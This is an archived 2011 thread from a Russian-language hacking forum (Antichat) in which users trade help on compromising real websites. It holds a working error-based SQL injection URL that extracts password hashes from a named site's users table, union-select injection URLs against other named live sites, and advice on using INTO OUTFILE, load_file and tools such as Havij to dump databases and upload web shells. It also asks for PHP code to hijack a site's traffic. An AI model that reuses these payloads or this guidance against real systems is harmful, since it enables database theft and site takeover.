ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
11.11.2011, 15:51
|
|
Познавший АНТИЧАТ
Регистрация: 09.11.2009
Сообщений: 1,077
Провел на форуме:
7879791
Репутация:
265
|
|
Сообщение от max9707
max9707 said:
Собственно у меня вопрос. Если я имею доступ к одному сайту (или к шаблонам) что мне вставить в php код (какой код шелла) что бы трафик просто сливался на один сайт и все.
Заранее спасибо!
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR]
это для iframe трафа
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]
[/COLOR][/COLOR]
это что бы полностью твой сайт выводился
|
|
|
11.11.2011, 19:30
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
Сообщение от stepashka_
stepashka_ said:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR]
это для iframe трафа
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]
[/COLOR][/COLOR]
это что бы полностью твой сайт выводился этот код в php должен быть в php-тегах к примеру
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]echo[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];[/COLOR][/COLOR]
и чтобы не нарушить структуру синтаксиса, html-кода, заменил двойные ковычки на одинарные.
|
|
|
|
11.11.2011, 23:03
|
|
Guest
Сообщений: n/a
Провел на форуме:
1505
Репутация:
0
|
|
есть sqli, на сервере
- root
- File_priv=Y
- путь /var/www/имясайта/имяфайла (прописан в нескольких местах в бд, я не думаю, что он ложный)
- вывод ошибок выключен
- mq - off
а сама проблема заключается в том, что при заливке into_outfile даже просто не указывая директорию, а прописывая '1.php' к примеру - выкидывает!
когда ввожу полный путь - тоже самое.
при load_file открывается корневые .htaccess и .htpasswd но их читает пустыми. тоесть поле пустое и ничего вообще не выводится хотя я уверен там хоть 1 строчка но есть
когда вбиваю путь до определенного файла сайта - также выкидывает(
что это такое и возможно ли решить проблему?
|
|
|
|
12.11.2011, 00:50
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Сообщение от Hack_Master
Hack_Master said:
есть sqli, на сервере
- root
- File_priv=Y
- путь /var/www/имясайта/имяфайла (прописан в нескольких местах в бд, я не думаю, что он ложный)
- вывод ошибок выключен
- mq - off
а сама проблема заключается в том, что при заливке into_outfile даже просто не указывая директорию, а прописывая '1.php' к примеру - выкидывает!
когда ввожу полный путь - тоже самое.
при load_file открывается корневые .htaccess и .htpasswd но их читает пустыми. тоесть поле пустое и ничего вообще не выводится хотя я уверен там хоть 1 строчка но есть
когда вбиваю путь до определенного файла сайта - также выкидывает(
что это такое и возможно ли решить проблему?
Просто прав не хватает, скорей всего или мускул на другом сервере.
Только если ты указываешь файл без пути типа outfile '1.php', то запрос должен сработать и файл 1.php должен создастся в папке с мускулом, на которую права, разумеется, всегда есть. То же самое и для /tmp/. А passwd читается?
|
|
|
|
12.11.2011, 01:28
|
|
Guest
Сообщений: n/a
Провел на форуме:
11063
Репутация:
0
|
|
Чем слить базы быстрее чем с Havij 1.15 ???
А то так и с ума сойти можно одну базу сливать целый день.
И если база больше 5 метров он **** вообще виснет.
Кто чем сливает базы большие ?
Щас пробую rsaUnDumper_sql__2.0
Перехватил снифером запрос с Havij 1.15 при сливе базы .
_http://www.***********.us/product.php?id=1023%27+and%28select+1+from%28selec t+count%28*%29%2Cconcat%28%28select+%28select+%28s elect+concat%280x7e%2C0x27%2Cusers.pass%2C0x27%2C0 x7e%29+from+%60dbase%60.users+Order+by+email+limit +28396%2C1%29+%29+from+%60information_schema%60.ta bles+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x +from+%60information_schema%60.tables+group+by+x%2 9a%29+and+%271%27%3D%271
Как его теперь подправить под rsaUnDumper_sql__2.0 ?
|
|
|
|
12.11.2011, 10:05
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
Сообщение от zapadlo_zapa
zapadlo_zapa said:
Чем слить базы быстрее чем с Havij 1.15 ???
А то так и с ума сойти можно одну базу сливать целый день.
И если база больше 5 метров он **** вообще виснет.
Кто чем сливает базы большие ?
Щас пробую rsaUnDumper_sql__2.0
Перехватил снифером запрос с Havij 1.15 при сливе базы .
_http://www.***********.us/product.php?id=1023%27+and%28select+1+from%28selec t+count%28*%29%2Cconcat%28%28select+%28select+%28s elect+concat%280x7e%2C0x27%2Cusers.pass%2C0x27%2C0 x7e%29+from+%60dbase%60.users+Order+by+email+limit +28396%2C1%29+%29+from+%60information_schema%60.ta bles+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x +from+%60information_schema%60.tables+group+by+x%2 9a%29+and+%271%27%3D%271
Как его теперь подправить под rsaUnDumper_sql__2.0 ?
хавиж работает с выводом через ошибку..не знаю как rsaUnDumper? если работает то можно..если нет то писать скрип...или же исползовать скрипт от Пашкелы..на форуме найдешь
|
|
|
|
12.11.2011, 19:49
|
|
Guest
Сообщений: n/a
Провел на форуме:
107835
Репутация:
23
|
|
Сообщение от zapadlo_zapa
zapadlo_zapa said:
Чем слить базы быстрее чем с Havij 1.15 ???
А то так и с ума сойти можно одну базу сливать целый день.
И если база больше 5 метров он **** вообще виснет.
Кто чем сливает базы большие ?
Щас пробую rsaUnDumper_sql__2.0
Перехватил снифером запрос с Havij 1.15 при сливе базы .
_http://www.***********.us/product.php?id=1023%27+and%28select+1+from%28selec t+count%28*%29%2Cconcat%28%28select+%28select+%28s elect+concat%280x7e%2C0x27%2Cusers.pass%2C0x27%2C0 x7e%29+from+%60dbase%60.users+Order+by+email+limit +28396%2C1%29+%29+from+%60information_schema%60.ta bles+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x +from+%60information_schema%60.tables+group+by+x%2 9a%29+and+%271%27%3D%271
Как его теперь подправить под rsaUnDumper_sql__2.0 ?
WebCruiser работает довольно быстро
/showpost.php?p=2430589&postcount=6
|
|
|
|
12.11.2011, 22:25
|
|
Guest
Сообщений: n/a
Провел на форуме:
2365
Репутация:
0
|
|
help me
http://www.mobil.ru/profile_notes.php?product_id=4'''410&&n=-13
|
|
|
|
13.11.2011, 10:33
|
|
Познающий
Регистрация: 27.01.2008
Сообщений: 57
Провел на форуме:
355954
Репутация:
32
|
|
Реально ли слить сайт или залить шел в данном случае:
Сообщение от None
http://la2-shop.ru/articles.php?id=1555555'+union+select+1,2,concat_w s(0x3a,user(),database())+--+
Путь:
Сообщение от None
/home/tok-center/la2-shop.ru/docs/
Через Load_file не получалось |
|
|
|
13.11.2011, 13:39
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
Сообщение от DJ
[akep"]
DJ ][akep said:
Реально ли слить сайт или залить шел в данном случае:
Путь:
Через Load_file не получалось
и не получится..прав то нет у юзверя бд на запись...
шелл залить есть возможность ,но по другому
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для DJ ][akep](/avatars/avatar48987.jpg?2897834){kind=avatar}
Похожие темы
Линейный вид
